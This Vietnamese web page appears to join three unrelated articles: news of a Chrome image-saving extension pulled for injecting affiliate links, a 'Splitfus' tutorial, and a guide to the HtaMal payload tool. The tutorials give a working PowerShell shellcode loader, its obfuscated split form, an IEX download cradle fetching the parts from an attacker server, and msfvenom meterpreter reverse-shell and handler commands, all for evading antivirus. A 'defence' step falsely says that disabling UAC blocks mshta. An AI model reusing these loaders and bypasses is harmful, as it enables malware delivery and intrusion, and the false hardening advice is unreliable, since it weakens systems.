Tiện ích triệu người dùng biến mất không dấu vết

Vừa qua, cộng đồng công nghệ, đặc biệt là trên diễn đàn Reddit, đã xôn xao trước thông tin tiện ích mở rộng “Save image as Type” đột ngột bị vô hiệu hóa trên trình duyệt Chrome. Không chỉ ngừng hoạt động, tiện ích này còn bị xóa sổ hoàn toàn khỏi Chrome Web Store, trang giới thiệu cũng không thể truy cập được nữa.

Nguyên nhân được Google đưa ra là do công cụ này chứa phần mềm độc hại. Đây là một đòn giáng mạnh vào lòng tin của hơn 1.000.000 người dùng đã cài đặt và tin tưởng nó. Trước đây, “Save image as Type” rất được yêu thích vì tính năng vượt trội: cho phép người dùng tải về hình ảnh dưới các định dạng phổ biến như JPG hay PNG, ngay cả khi quản trị viên trang web đã cố tình chặn tính năng này từ menu chuột phải thông thường.

Save image as Type chứa mã độc hoạt động ra sao?

Theo phân tích từ các chuyên gia bảo mật của AnTuTu và XDA, mã độc không nằm ở chức năng chính của tiện ích mà được giấu kín trong một tệp tin có tên inject.js. Cơ chế hoạt động của nó vô cùng tinh vi và khó phát hiện:

• Kích hoạt kết nối: Khi người dùng duyệt web, đoạn mã này sẽ âm thầm kết nối đến một máy chủ từ xa để tải về một danh sách các URL mục tiêu.
• Chèn mã theo dõi: Khi người dùng truy cập vào một trong 578 trang web có trong danh sách (chủ yếu là các trang thương mại điện tử lớn), tiện ích sẽ tự động chèn các đoạn mã tiếp thị liên kết (affiliate links) của kẻ xấu.
• Chiếm đoạt hoa hồng: Nếu người dùng thực hiện mua sắm, khoản tiền hoa hồng đáng lẽ thuộc về các nhà tiếp thị chân chính hoặc chủ nhân liên kết gốc sẽ bị chuyển hướng vào túi của kẻ phát tán mã độc.

Hành vi này, dù không trực tiếp cài virus phá hủy máy tính, nhưng lại là một hình thức đánh cắp dữ liệu và trục lợi mờ ám, tương tự như vụ việc của tiện ích nổi tiếng Honey trước đây. Rõ ràng, việc Save image as Type chứa mã độc là một mối nguy hiểm thực sự cho người dùng.

Ai đứng sau sự thay đổi nguy hiểm này?

Điều gì đã biến một công cụ hữu ích thành phần mềm gián điệp? Dữ liệu cho thấy một sự thay đổi đáng ngờ vào khoảng tháng 8 vừa qua. Email của nhà phát triển đã được đổi từ “Image4Tools” sang một cá nhân tên là “Lauren Bridge”.

Giả thuyết lớn nhất được đặt ra là tiện ích này đã được bán lại sau khi đạt được cột mốc 1 triệu người dùng. Chủ sở hữu mới đã lợi dụng cơ sở người dùng khổng lồ sẵn có để cập nhật và chèn thêm mã độc nhằm mục đích kiếm lợi bất chính. Đáng chú ý, Microsoft đã nhận ra sự nguy hiểm và gỡ bỏ tiện ích này khỏi trình duyệt Edge từ cuối năm ngoái. Tuy nhiên, phải đến tận bây giờ, Google Chrome mới có động thái xử lý triệt để.

Đâu là giải pháp thay thế an toàn?

Với sự sụp đổ của “Save image as Type”, nhiều người dùng đang tìm kiếm một công cụ thay thế đáng tin cậy. Một trong những lựa chọn được cộng đồng đề xuất là “Save Image As PNG“. Dưới đây là bảng so sánh nhanh để bạn có cái nhìn tổng quan:

Mặc dù có lượng người dùng ít hơn, “Save Image As PNG” lại là một lựa chọn an toàn và tuân thủ nghiêm ngặt các quy định của Chrome, giúp bạn yên tâm sử dụng mà không lo bị theo dõi.

Hướng dẫn kiểm tra và gỡ bỏ tiện ích độc hại khỏi Chrome

Nếu bạn đã cài đặt “Save image as Type”, hãy gỡ bỏ nó ngay lập tức theo các bước sau:

Bước 1: Mở trình duyệt Chrome, nhập chrome://extensions vào thanh địa chỉ và nhấn Enter.

Bước 2: Trong danh sách các tiện ích đã cài đặt, tìm đến “Save image as Type“.

Bước 3: Nhấn vào nút “Xóa” và xác nhận để gỡ bỏ hoàn toàn tiện ích khỏi trình duyệt của bạn.

Việc gỡ bỏ này sẽ ngăn chặn mọi hoạt động thu thập dữ liệu trong tương lai.

Lời kết

Sự việc Save image as Type chứa mã độc một lần nữa cho thấy không phải tiện ích nào có nhiều lượt tải cũng an toàn. Người dùng cần hết sức cảnh giác, kiểm tra kỹ lưỡng các quyền truy cập trước khi cài đặt bất kỳ công cụ nào vào trình duyệt của mình.

Những câu hỏi thường gặp (Q&A)

1. Tiện ích này có đánh cắp mật khẩu của tôi không?

Theo báo cáo, mã độc chủ yếu tập trung vào việc chèn link tiếp thị để chiếm đoạt hoa hồng, không có bằng chứng cho thấy nó trực tiếp đánh cắp mật khẩu hay thông tin tài chính.

2. Tôi đã gỡ tiện ích rồi, có cần làm gì thêm không?

Việc gỡ bỏ tiện ích đã ngăn chặn hành vi độc hại. Để an toàn hơn, bạn có thể xóa cache và cookie của trình duyệt để loại bỏ các mã theo dõi còn sót lại.

3. Làm sao để nhận biết một tiện ích mở rộng an toàn?

Hãy kiểm tra nhà phát triển có uy tín không, đọc các bài đánh giá gần đây (không chỉ xem điểm tổng), và đặc biệt chú ý đến các quyền mà tiện ích yêu cầu khi cài đặt. Một tiện ích lưu ảnh không cần quyền “đọc và thay đổi tất cả dữ liệu trên các trang web bạn truy cập”.

Splitfus là gì ?

Splitfus (viết tắt của Split + Obfuscation) là kỹ thuật mà hacker sử dụng để:

• Chia nhỏ (split) mã độc PowerShell thành nhiều đoạn, ví dụ: malware1.ps1, malware2.ps1, malware3.ps1,…
• Làm rối (obfuscate) từng đoạn mã để tránh bị phân tích hoặc phát hiện bởi chữ ký của AV
• Thực thi theo nhiều giai đoạn (staged execution): Khi thực hiện tấn công, máy nạn nhân sẽ tải từng đoạn mã từ máy chủ hacker và chạy trực tiếp trong bộ nhớ, thay vì lưu toàn bộ payload trên đĩa. Đây là kiểu thực thường được biết đến với tên gọi multi-stage attack hoặc fileless malware

Tại sao Splitfus hiệu quả trong việc vượt qua Antivirus ?

• Giảm khả năng bị phát hiện theo chữ ký (signature-based detection)
• AV truyền thống dựa vào chữ ký hoặc mẫu mã độc. Khi mã độc được chia nhỏ và mã hóa, không có đoạn nào chứa toàn bộ payload, khiến việc phát hiện trở nên khó khăn
• Tránh quét tĩnh và sandbox
  • Nếu toàn bộ payload nằm trong một file, AV dễ dàng phân tích trước khi chạy
  • Với Splitfus, mã độc được tải động (on-demand) từ máy chủ hacker, nên môi trường sandbox khó tái hiện được toàn bộ quy trình
• Bypass AMSI (Antimalware Scan Interface)
• AMSI của Windows có khả năng quét nội dung PowerShell trước khi thực thi. Tuy nhiên, với Splitfus:
  • Các đoạn mã nhỏ, obfuscated và tải động → khó bị AMSI phân tích đầy đủ
  • Nhiều hacker còn kết hợp AMSI bypass với Splitfus để tăng hiệu quả
• Linh hoạt và dễ cập nhật
• Hacker có thể thay đổi một đoạn bất kỳ trên máy chủ mà không cần phát tán lại toàn bộ payload. Điều này khiến việc truy vết hoặc phát triển chữ ký AV trở nên khó hơn

Phần lý thuyết đơn giản ngắn gọn vậy thôi, bây giờ mình sẽ lấy ví dụ thực tế cho bạn dễ hình dung hơn cách kỹ thuật được thực hiện

Ví dụ thực tế

Nhiều chiến dịch tấn công APT và malware framework như Cobalt Strike, PowerShell Empire, Metasploit đã áp dụng cơ chế tương tự Splitfus để phát tán payload staged. Đây là xu hướng phổ biến trong các cuộc tấn công fileless hiện nay.

Được rồi, bây giờ cùng mình thử chạy 1 đoạn code Powershell sau: Write-Host “Invoke-Mimikatz” . Ồ bạn thấy đấy, Antivirus đã phát hiện và chặn đoạn mã này. Đây là chỉ 1 đoạn mã in ra chuỗi trên terminal mà tại sao lại bị chặn nhỉ ? Bởi vì nó chứa chuỗi ký tự “Invoke-Mimikatz”. Đây là một chữ ký (signature) cực kỳ nổi tiếng và đặc trưng của công cụ tấn công Mimikatz

Như vậy, các AV được cấu hình để chặn ngay lập tức bất kỳ đoạn mã nào chứa chữ ký nguy hiểm này, ngay cả ở giai đoạn sớm nhất, nhằm ngăn chặn mọi ý đồ tiềm tàng liên quan đến Mimikatz. Đây là một biện pháp phòng ngừa rủi ro.

Vậy là chúng ta đã biết cách AV được cấu hình, giờ hãy thử tách chuỗi “Invoke-Mimikatz” thành nhiều chuỗi ngắn khác nhau.

Như bạn thấy, dù tách chuỗi thành các phần nhỏ như “Invo”, “ke”, “-Mim”, “ikatz”, AV vẫn không phát hiện ra đoạn mã độc. Sau đó, khi chúng ta nối lại các chuỗi này trong quá trình thực thi kết quả vẫn là “Invoke-Mimikatz” nhưng đã vượt qua được hệ thống phát hiện của AV. Đây chính là ví dụ đơn giản nhất của kỹ thuật Splitfus

Bây giờ chúng ta cùng xem 1 ví dụ khai thác thực tế hơn với đoạn code Powershell sau, với file tên là sc-original.ps1

[Byte[]] $shellcode = @(0x50, 0x51, 0x52, 0x53, 0x56, 0x57, 0x55, 0x6A, 0x60, 0x5A, 0x68, 0x63, 0x61, 0x6C, 0x63, 0x54,
0x59, 0x48, 0x83, 0xEC, 0x28, 0x65, 0x48, 0x8B, 0x32, 0x48, 0x8B, 0x76, 0x18, 0x48, 0x8B, 0x76,
0x10, 0x48, 0xAD, 0x48, 0x8B, 0x30, 0x48, 0x8B, 0x7E, 0x30, 0x03, 0x57, 0x3C, 0x8B, 0x5C, 0x17,
0x28, 0x8B, 0x74, 0x1F, 0x20, 0x48, 0x01, 0xFE, 0x8B, 0x54, 0x1F, 0x24, 0x0F, 0xB7, 0x2C, 0x17,
0x8D, 0x52, 0x02, 0xAD, 0x81, 0x3C, 0x07, 0x57, 0x69, 0x6E, 0x45, 0x75, 0xEF, 0x8B, 0x74, 0x1F,
0x1C, 0x48, 0x01, 0xFE, 0x8B, 0x34, 0xAE, 0x48, 0x01, 0xF7, 0x99, 0xFF, 0xD7, 0x48, 0x83, 0xC4,
0x30, 0x5D, 0x5F, 0x5E, 0x5B, 0x5A, 0x59, 0x58, 0xC3)

function LookupFunc {
Param ($moduleName, $functionName)
$assem = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.UnsafeNativeMethods')
$tmp = $assem.GetMethods() | ForEach-Object {If($_.Name -eq "GetProcAddress") {$_}}
$handle = $assem.GetMethod('GetModuleHandle').Invoke($null, @($moduleName));
[IntPtr] $result = 0;
try {
Write-Host "First Invoke - $moduleName $functionName";
$result = $tmp[0].Invoke($null, @($handle, $functionName));
}catch {
Write-Host "Second Invoke - $moduleName $functionName";
$handle = new-object -TypeName System.Runtime.InteropServices.HandleRef -ArgumentList @($null, $handle);
$result = $tmp[0].Invoke($null, @($handle, $functionName));
}
return $result;
}

function getDelegateType {
Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $func,[Parameter(Position = 1)] [Type] $delType = [Void])
$type = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType','Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
$type.DefineConstructor('RTSpecialName, HideBySig, Public',[System.Reflection.CallingConventions]::Standard, $func).SetImplementationFlags('Runtime, Managed')
$type.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $delType, $func).SetImplementationFlags('Runtime, Managed')
return $type.CreateType()
}

$lpMem = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll VirtualAlloc),(getDelegateType @([IntPtr], [UInt32], [UInt32], [UInt32])([IntPtr]))).Invoke([IntPtr]::Zero, $shellcode.Length, 0x3000, 0x40)
[System.Runtime.InteropServices.Marshal]::Copy($shellcode, 0, $lpMem, $shellcode.Length)
[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll CreateThread),(getDelegateType @([IntPtr], [UInt32], [IntPtr], [IntPtr],[UInt32], [IntPtr])([IntPtr]))).Invoke([IntPtr]::Zero,0,$lpMem,[IntPtr]::Zero,0,[IntPtr]::Zero)

Đây là đoạn mã Powershell thực thi Shellcode của calc.exe trên Windows, nếu chúng ta thực thi toàn bộ đoạn mã này thì sẽ bị AV chặn. Và lúc này mình sẽ áp dụng kĩ thuật Splitfus. Trước tiên mình sẽ sử dụng công cụ Chimera để xáo trộn đoạn mã này trở nên khó đọc hơn với câu lệnh sau

./chimera.sh -f sc-original.ps1 -l 3 -v -t -s -b -j -o sc-obf.ps1

Giờ đây, đoạn mã Powershell ban đầu đã được làm rối bằng cách thay đổi biến. Tiếp theo, mình sẽ chia tệp này thành nhiều phần nhỏ hơn để thực thi một cách rời rạc, khiến hệ thống bảo mật không thể phát hiện ra chữ ký đặc trưng của shellcode

Tiếp theo, mình chia tệp sc-obf.ps1 thành 4 tệp riêng biệt: sc1.ps1 ( chứa biến lưu trữ Shellcode ), sc2.ps1 ( chứa hàm LookupFunc đã làm rối ), sc3.ps1 ( chứa hàm getDelegateType đã làm rối ) và sc4.ps1 ( chứa 3 dòng code cuối cùng ). Mỗi phần này nếu bị quét riêng lẻ sẽ không gây cảnh báo từ AV. Đây là đoạn code đã xáo trộn và tách ra riêng biệt từng file như mình nói

#sc1.ps1
[Byte[]] $LthwJuMUAmqvMRjAPliXdGwmLaXmjcSvILeKSAWVe = @(0x50, 0x51, 0x52, 0x53, 0x56, 0x57, 0x55, 0x6A, 0x60, 0x5A, 0x68, 0x63, 0x61, 0x6C, 0x63, 0x54,
0x59, 0x48, 0x83, 0xEC, 0x28, 0x65, 0x48, 0x8B, 0x32, 0x48, 0x8B, 0x76, 0x18, 0x48, 0x8B, 0x76,
0x10, 0x48, 0xAD, 0x48, 0x8B, 0x30, 0x48, 0x8B, 0x7E, 0x30, 0x03, 0x57, 0x3C, 0x8B, 0x5C, 0x17,
0x28, 0x8B, 0x74, 0x1F, 0x20, 0x48, 0x01, 0xFE, 0x8B, 0x54, 0x1F, 0x24, 0x0F, 0xB7, 0x2C, 0x17,
0x8D, 0x52, 0x02, 0xAD, 0x81, 0x3C, 0x07, 0x57, 0x69, 0x6E, 0x45, 0x75, 0xEF, 0x8B, 0x74, 0x1F,
0x1C, 0x48, 0x01, 0xFE, 0x8B, 0x34, 0xAE, 0x48, 0x01, 0xF7, 0x99, 0xFF, 0xD7, 0x48, 0x83, 0xC4,
0x30, 0x5D, 0x5F, 0x5E, 0x5B, 0x5A, 0x59, 0x58, 0xC3)

#sc2.ps1
function iRsUmgOEtIChVLeYYQcNrgKkLwHyChhaXKTDqfFcEs {
Param ($JzGCXcYJmJdQKoCerSqNXT, $LaHgzlZeSdXkwSwksNKHLbDEymlFp)
$FTNFeBumwTgCKnnMPmVEdfKoaWinKHpxBMujd = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.UnsafeNativeMethods')
$jWwCsHjXRPShPEyyEBpzOw = $FTNFeBumwTgCKnnMPmVEdfKoaWinKHpxBMujd.GetMethods() | ForEach-Object {If($_.Name -eq "GetProcAddress") {$_}}
$aFUfleAnufbxjgylCpxMoZnlpUkts = $FTNFeBumwTgCKnnMPmVEdfKoaWinKHpxBMujd.GetMethod('GetModuleHandle').Invoke($null, @($JzGCXcYJmJdQKoCerSqNXT));
[IntPtr] $XHcKpPqwXEaSejzfchayBW = 0;
try {
Write-Host "First Invoke - $JzGCXcYJmJdQKoCerSqNXT $LaHgzlZeSdXkwSwksNKHLbDEymlFp";
$XHcKpPqwXEaSejzfchayBW = $jWwCsHjXRPShPEyyEBpzOw[0].Invoke($null, @($aFUfleAnufbxjgylCpxMoZnlpUkts, $LaHgzlZeSdXkwSwksNKHLbDEymlFp));
}catch {
Write-Host "Second Invoke - $JzGCXcYJmJdQKoCerSqNXT $LaHgzlZeSdXkwSwksNKHLbDEymlFp";
$aFUfleAnufbxjgylCpxMoZnlpUkts = new-object -TypeName System.Runtime.InteropServices.HandleRef -ArgumentList @($null, $aFUfleAnufbxjgylCpxMoZnlpUkts);
$XHcKpPqwXEaSejzfchayBW = $jWwCsHjXRPShPEyyEBpzOw[0].Invoke($null, @($aFUfleAnufbxjgylCpxMoZnlpUkts, $LaHgzlZeSdXkwSwksNKHLbDEymlFp));
}
return $XHcKpPqwXEaSejzfchayBW;
}

#sc3.ps1
function DdKSsQGFmFfVhpHEtVzHaZFCWQGs {
Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $GVUAdTXmnEpoFzPorhRfka,[Parameter(Position = 1)] [Type] $RRqnOWxmsxKutFBpzSBCMlckCOfBNELkuuJsUOnHsB = [Void])
$YPjndxTHFIcbnisDBdfZAiWWMORMQEMwWeH = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType','Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
$YPjndxTHFIcbnisDBdfZAiWWMORMQEMwWeH.DefineConstructor('RTSpecialName, HideBySig, Public',[System.Reflection.CallingConventions]::Standard, $GVUAdTXmnEpoFzPorhRfka).SetImplementationFlags('Runtime, Managed')
$YPjndxTHFIcbnisDBdfZAiWWMORMQEMwWeH.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $RRqnOWxmsxKutFBpzSBCMlckCOfBNELkuuJsUOnHsB, $GVUAdTXmnEpoFzPorhRfka).SetImplementationFlags('Runtime, Managed')
return $YPjndxTHFIcbnisDBdfZAiWWMORMQEMwWeH.CreateType()
}

#sc4.ps1
$WCUBLvVuyTuTmQBWbcWjbjzYViRFjOXfFH = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((iRsUmgOEtIChVLeYYQcNrgKkLwHyChhaXKTDqfFcEs kernel32.dll VirtualAlloc),(DdKSsQGFmFfVhpHEtVzHaZFCWQGs @([IntPtr], [UInt32], [UInt32], [UInt32])([IntPtr]))).Invoke([IntPtr]::Zero, $LthwJuMUAmqvMRjAPliXdGwmLaXmjcSvILeKSAWVe.Length, 0x3000, 0x40)
[System.Runtime.InteropServices.Marshal]::Copy($LthwJuMUAmqvMRjAPliXdGwmLaXmjcSvILeKSAWVe, 0, $WCUBLvVuyTuTmQBWbcWjbjzYViRFjOXfFH, $LthwJuMUAmqvMRjAPliXdGwmLaXmjcSvILeKSAWVe.Length)
[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((iRsUmgOEtIChVLeYYQcNrgKkLwHyChhaXKTDqfFcEs kernel32.dll CreateThread),(DdKSsQGFmFfVhpHEtVzHaZFCWQGs @([IntPtr], [UInt32], [IntPtr], [IntPtr],[UInt32], [IntPtr])([IntPtr]))).Invoke([IntPtr]::Zero,0,$WCUBLvVuyTuTmQBWbcWjbjzYViRFjOXfFH,[IntPtr]::Zero,0,[IntPtr]::Zero)

Các bước để thực hiện kĩ thuật Splitfus này cũng rất đơn giản. Đầu tiên, mình sử dụng lệnh sau để khởi tạo server Python trên cổng 80 với địa chỉ IP là 192.168.1.17:

python3 -m http.server 80

Server này sẽ lưu các file script PowerShell đã tách nhỏ và làm rối, cho phép máy nạn nhân tải xuống từng phần riêng biệt.

Cuối cùng mình tạo 1 đoạn lệnh thực thi ngắn gọn để thực thi trên máy nạn nhân

1..4 | ForEach-Object { IEX (New-Object System.Net.WebClient).DownloadString("http://192.168.1.17/sc$_.ps1") }

Lệnh này sẽ tải xuống và thực thi từng file script từ sc1.ps1 đến sc4.ps1. Đây là cách hiệu quả để vượt qua các cơ chế phát hiện mã độc vì mỗi phần riêng lẻ có thể trông vô hại. Khi kết hợp lại, chúng tạo thành một cuộc tấn công hoàn chỉnh mà nhiều giải pháp bảo mật không thể phát hiện

Với Metasploit, việc tạo shellcode trở nên dễ dàng hơn rất nhiều. Mình sẽ sử dụng lệnh msfvenom để tạo ra shellcode mới, sau đó thay thế vào script sc1.ps1. Điều này cho phép mình tùy biến cuộc tấn công theo nhiều hướng khác nhau, từ lấy quyền điều khiển máy tính nạn nhân đến đánh cắp thông tin hoặc cài đặt backdoor

https://streamable.com/rwoo4k

Và đó là những ví dụ đơn giản, nhưng thực tế, mã độc PowerShell không hề đơn giản như vậy. Các hacker sẽ phải dùng thêm kĩ thuật Bypass AMSI để tăng tỉ lệ thành công

Cách phòng thủ trước kỹ thuật Splitfus

Kỹ thuật Splitfus là một trong những phương pháp tấn công bằng PowerShell tinh vi, khó phát hiện nếu hệ thống không được giám sát chặt chẽ. Để phòng thủ hiệu quả trước Splitfus, đội ngũ an ninh mạng cần triển khai đồng bộ nhiều biện pháp chủ động, từ việc giám sát hành vi cho đến xây dựng hệ thống cảnh báo sớm và đào tạo người dùng cuối.

 Tăng cường giám sát PowerShell

PowerShell là công cụ thường bị lạm dụng trong các cuộc tấn công hiện đại. Để theo dõi hoạt động bất thường, hệ thống cần bật tính năng ghi nhật ký Script Block Logging (sử dụng Event ID 4104) kết hợp với Module Logging. Những thiết lập này giúp lưu lại toàn bộ lệnh PowerShell đã được thực thi, kể cả khi đã bị làm rối mã (obfuscate). Ngoài ra, nên kích hoạt chế độ Constrained Language Mode để hạn chế việc sử dụng các lệnh nguy hiểm trong môi trường thực thi PowerShell.

Kích hoạt và bảo vệ AMSI (Antimalware Scan Interface)

AMSI là lớp phòng vệ quan trọng giúp phân tích mã trước khi được thực thi trong PowerShell. Việc đảm bảo AMSI luôn được bật và không bị vượt qua (bypass) là điều thiết yếu. Khi tích hợp cùng Microsoft Defender hoặc các giải pháp EDR có hỗ trợ quét AMSI, khả năng phát hiện mã độc bị làm rối sẽ được nâng cao rõ rệt, giúp ngăn chặn sớm các hành vi tấn công từ Splitfus.

Kiểm tra hành vi tải động trong hệ thống

Một đặc điểm thường thấy của Splitfus là sử dụng các tham số nguy hiểm trong PowerShell như EncodedCommand hoặc gọi hàm IEX để tải mã từ xa thông qua chuỗi như (New-Object Net.WebClient).DownloadString. Hệ thống EDR hoặc HIDS cần được cấu hình để nhận diện những hành vi này. Đồng thời, cần cảnh giác khi phát hiện script được tải về từ domain không đáng tin cậy, đặc biệt là các yêu cầu HTTP GET chứa tập tin đuôi .ps1.

Thiết lập kiểm soát truy cập mạng chặt chẽ

Kiểm soát truy cập mạng đóng vai trò quan trọng trong việc ngăn chặn Splitfus giao tiếp với máy chủ điều khiển (C2 server). Cần chủ động chặn các kết nối outbound đến địa chỉ IP hoặc domain nghi ngờ. Việc cấu hình proxy kết hợp với kiểm tra TLS (TLS inspection) sẽ giúp phát hiện các hành vi tải mã ẩn dưới kết nối được mã hóa. Bên cạnh đó, cập nhật liên tục các chỉ số tấn công (IOC) từ nguồn Threat Intelligence Feed sẽ nâng cao khả năng nhận diện và phản ứng kịp thời.

Cuối cùng, yếu tố con người luôn là mắt xích yếu nhất trong chuỗi phòng thủ. Việc tuyên truyền và đào tạo người dùng cuối nhằm nâng cao nhận thức bảo mật là điều bắt buộc. Nhân viên cần được hướng dẫn không chạy script từ các nguồn không rõ ràng. Đồng thời, kỹ năng nhận diện email giả mạo (phishing) cũng cần được chú trọng vì đây thường là điểm xuất phát của các cuộc tấn công Splitfus.

Câu hỏi thường gặp

Splitfus là gì và tại sao nó hiệu quả trong việc vượt qua Antivirus?

Splitfus là kỹ thuật hacker chia nhỏ mã độc PowerShell, làm rối code và thực thi từng phần. Điều này giúp giảm khả năng bị phát hiện dựa trên chữ ký, tránh quét tĩnh và sandbox, đồng thời bypass AMSI (Antimalware Scan Interface).

Kỹ thuật Splitfus hoạt động như thế nào trong thực tế?

Hacker chia mã độc thành nhiều đoạn nhỏ, mã hóa chúng và tải từng đoạn lên máy nạn nhân để thực thi. Việc này làm cho mã độc khó bị phát hiện hơn so với việc tải và thực thi một file mã độc lớn.

Có những công cụ nào hỗ trợ thực hiện kỹ thuật Splitfus?

Nhiều chiến dịch tấn công APT và framework malware như Cobalt Strike, PowerShell Empire, Metasploit sử dụng kỹ thuật tương tự Splitfus. Ngoài ra, các công cụ như Chimera có thể giúp làm rối mã nguồn PowerShell, hỗ trợ việc sử dụng kỹ thuật này.

Lưu ý: Bài viết này chỉ dành cho mục đích nghiên cứu, học tập. Anonyviet sẽ không chịu bất cứ mọi hành vi bất hợp pháp nào !

Khái niệm ngắn gọn về HTA và phương thức tấn công

HTA là gì?

HTA (HTML Application) là một loại ứng dụng dựa trên HTML do Microsoft phát triển, có thể thực thi trực tiếp thông qua mshta.exe mà không bị hạn chế bởi sandbox của trình duyệt. Chính vì thế HTA trở thành một công cụ hữu ích cho các tác vụ tự động hóa hợp pháp, nhưng cũng là một công cụ lợi hại trong tay hacker

Tại sao HTA có thể bị lạm dụng?

• Chạy với quyền cao: HTA có thể thực thi VBScript/JavaScript với quyền của người dùng mà không cần hiển thị cửa sổ cảnh báo như khi chạy script thông thường
• Không cần ghi file: Hacker có thể tải HTA từ xa mà không cần lưu trữ nội dung độc hại trên máy nạn nhân
• Bỏ qua một số giải pháp bảo mật: Một số phần mềm Antivirus không quét HTA kỹ như các file thực thi khác (.exe, .dll), tạo ra cơ hội bypass

Cách thức hoạt động của payload HtaMal

HtaMal là một công cụ tạo ra 1 payload HTA để thực thi shellcode từ xa, giúp tránh bị phát hiện bởi Antivirus. Quy trình tổng quát như sau:

Tạo file HTA chứa mã JavaScript độc hại

• Trong source code của tool mình đã xáo trộn payload ở trang https://obfuscator.io/, bạn có thể xem các source code của payload ở phần cuối trong source tool
• Payload của HtaMal sẽ chuyển tên file, url và lệnh thực thi sang hex và 2 tệp: autoit.exe và loader.a3x được mã hóa bằng thuật toán XOR. Khi payload thực thi trên máy nạn nhân, nó sẽ tự giải mã và thực thi lệnh trong thư mục %appdata%

Tải shellcode từ máy chủ C2: Khi người dùng mở file HTA, script loader.a3x sẽ lấy shellcode từ server của hacker

Lợi dụng chữ ký số (Digital Signature) hợp lệ của file autoit.exe để bypass Antivirus

• Mình đã compile script loader.au3 sang loader.a3x, khi chạy lệnh autoit.exe loader.a3x <hex_url_shellcode> thực hiện tải xuống và thực thi shellcode từ xa, bằng cách sử dụng các hàm Windows API để cấp phát bộ nhớ, sao chép shellcode vào vùng nhớ đã cấp phát, sau đó tạo một luồng mới để thực thi shellcode.
• Một trong những kỹ thuật Bypass Antivirus (AV) phổ biến là lợi dụng chữ ký số hợp lệ của phần mềm hợp pháp để thực thi mã độc. Trong trường hợp này, mình đã lợi dụng AutoIt.exe có chữ ký số hợp lệ để tránh bị phát hiện bởi phần mềm bảo mật

HtaMal – Công cụ tạo payload thực thi Shellcode từ xa Bypass Antivirus

Để sử dụng công cụ này, bạn cần phải tải Python về máy, sau đó tải source code của tool tại đây, sau khi tải xong bạn giải nén ra và trải nghiệm thôi ( Pass giải nén: anonyviet.com )

Trước khi sử dụng HtaMal, chúng ta cần phải tạo ra một shellcode, ở đây mình sẽ sử dụng Metasploit để tạo với câu lệnh:

msfvenom -p windows/x64/meterpreter/reverse_https lhost=192.168.1.33 lport=8443 -f raw -o shellcode.bin

#Setup môi trường lệnh tấn công

msfconsole

use exploit/multi/handler

set payload windows/x64/meterpreter/reverse_https

set lhost=your ip address

set lport=your port

run

Tiếp đến, chạy lệnh python3 -m http.server 80 để mở ra server lưu trữ file shellcode.bin và python3 htamal.py để chạy tool. Bây giờ mình sẽ nhập url chứa shellcode của mình

Như vậy đã xong, bây giờ mình sẽ nén payload hta_payload.hta thành file zip với mật khẩu là 123123@

Và đây là kết quả:

Video demo:

Cách phòng chống tấn công bằng HTA

Do mshta.exe hiếm khi cần thiết trong môi trường doanh nghiệp, chặn mshta.exe là một cách đơn giản để giảm nguy cơ bị tấn công. Có thể thực hiện bằng cách:

Set-ItemProperty -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Policies\System" -Name "EnableLUA" -Value 0

Hoặc trong Group Policy:

• Computer Configuration → Windows Settings → Security Settings → Software Restriction Policies
• Thêm mshta.exe vào danh sách bị chặn

HtaMal là một công giúp tạo payload thực thi shellcode từ xa, sử dụng các kỹ thuật bypass Antivirus (AV) để tránh bị phát hiện. Bằng cách kết hợp HTA (HTML Application) với AutoIt, công cụ này có thể thực thi mã độc trực tiếp trong bộ nhớ. Tuy nhiên, điều quan trọng cần nhấn mạnh là HtaMal chỉ được sử dụng cho mục đích nghiên cứu bảo mật và kiểm thử xâm nhập hợp pháp.

Để phòng chống các kỹ thuật bypass AV như HtaMal, cần phải:
🔹 Giám sát tiến trình đáng ngờ, đặc biệt là AutoIt.exe.
🔹 Hạn chế thực thi HTA trên hệ thống nếu không cần thiết.
🔹 Áp dụng các cơ chế bảo vệ nâng cao như Application Whitelisting, AMSI Logging, và Behavioral Analysis.

👉 Bạn nghĩ gì về phương pháp này? Có cách nào cải thiện khả năng phát hiện của AV để chống lại kỹ thuật này không? Hãy chia sẻ ý kiến của bạn! 🚀

Câu hỏi thường gặp

HTA (HTML Application) là gì và tại sao nó lại dễ bị lợi dụng trong tấn công?

HTA là ứng dụng dựa trên HTML, có thể chạy trực tiếp bằng mshta.exe mà không bị hạn chế bởi sandbox trình duyệt. Điều này cho phép nó thực thi VBScript/JavaScript với quyền người dùng, tải mã độc từ xa mà không cần lưu file, và bỏ qua một số cơ chế bảo mật của Antivirus.

HtaMal hoạt động như thế nào để thực thi shellcode từ xa và vượt qua Antivirus?

HtaMal tạo payload HTA chứa mã JavaScript, tải shellcode từ máy chủ C2, và lợi dụng AutoIt.exe (có chữ ký số hợp lệ) để giải mã và thực thi shellcode trong bộ nhớ, qua đó tránh bị phát hiện.

Làm thế nào để phòng chống các cuộc tấn công sử dụng kỹ thuật tương tự như HtaMal?

